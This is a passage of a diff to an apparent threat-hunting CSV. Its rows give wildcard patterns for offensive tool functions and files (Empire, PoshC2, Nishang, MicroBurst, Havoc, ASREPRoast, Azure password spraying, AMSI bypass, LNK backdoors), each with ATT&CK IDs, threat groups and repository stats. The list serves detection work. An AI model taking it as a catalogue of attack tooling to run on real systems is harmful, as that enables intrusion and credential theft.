- T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForAllServicePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForAllUsers*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" @@ -11858,260 +12011,262 @@ "*Invoke-ACLPwn*","offensive_tool_keyword","Invoke-ACLpwn","Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.","T1098 - T1208 - T1484 - T1486 - T1059","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/Invoke-ACLPwn","1","0","N/A","N/A","5","498","86","2022-09-15T15:13:00Z","2018-04-26T09:21:27Z" "*Invoke-ACLScanner * -Filter *","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Invoke-ACLScanner * -Name *","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" -"*invoke-aclscanner*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-ACLScanner*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-ADCSTemplateRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-aclscanner*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-ACLScanner*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ADCSTemplateRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-ADSBackdoor*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*Invoke-ADSBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-AirstrikeAttackCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ADSBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-AirstrikeAttackCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-AllAccessChecks*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AllChecks*","offensive_tool_keyword","AD exploitation cheat sheet","Check for vulnerable programs and configs","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-AmsiBypass*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Invoke-AmsiBypass*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-APIConnectionHijack.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AmsiBypass*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-AmsiBypass*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-APIConnectionHijack.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-ARPScan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ARPScan.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-arpscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-ARPScan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ARPScan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ARPScan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-arpscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-ARPScan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ASREPRoast*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" -"*InvokeAssembly.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*InvokeAssembly.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*Invoke-AutoKerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" -"*Invoke-AzElevatedAccessToggle*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Invoke-AzRESTBastionShareableLink*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzElevatedAccessToggle*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzRESTBastionShareableLink*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*Invoke-AzureEnum.ps1*","offensive_tool_keyword","Invoke-AzureEnum","This cmdlet is used to perform users enumeration against Azure","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1","1","1","N/A","N/A","5","417","85","2023-04-05T22:03:19Z","2019-11-20T22:07:50Z" "*Invoke-AzurePasswordSpray*","offensive_tool_keyword","Invoke-AzurePasswordSpray","This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic Authentication","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1","1","1","N/A","N/A","5","417","85","2023-04-05T22:03:19Z","2019-11-20T22:07:50Z" -"*Invoke-AzureRmVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Invoke-AzVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BackdoorLNK.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-BadPotato*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-AzureRmVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 